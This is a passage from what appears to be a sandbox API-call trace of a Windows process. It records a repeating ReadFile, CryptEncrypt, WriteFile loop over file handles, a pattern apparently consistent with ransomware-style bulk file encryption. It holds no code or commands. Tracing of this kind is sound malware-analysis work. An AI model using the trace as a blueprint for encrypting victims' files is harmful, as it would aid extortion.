hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.246] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.246] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.246] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.246] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.246] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.246] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.246] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.247] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.247] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.247] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.247] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.247] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.247] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.247] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.247] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.247] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.247] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.247] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.247] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.248] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.248] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.248] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.248] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.248] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.248] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.248] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.248] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.248] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.248] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.248] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.248] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.249] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.249] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.249] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.249] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.249] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.249] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.249] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.249] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.249] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.249] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.249] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.249] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.250] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.250] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.250] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.250] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.250] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.250] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.250] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.250] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.250] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.250] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.251] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.251] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.251] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.251] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.251] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.251] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.251] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.251] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.251] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.251] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.251] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.251] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.252] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.252] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.252] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.252] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.252] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.252] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.252] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.252] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.252] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.252] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.252] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.252] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.253] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.253] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.253] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.253] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.253] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.253] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.253] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.253] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.253] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.253] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.253] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.253] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.254] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.254] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.254] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.254] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.254] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.254] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.254] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.254] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.254] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: 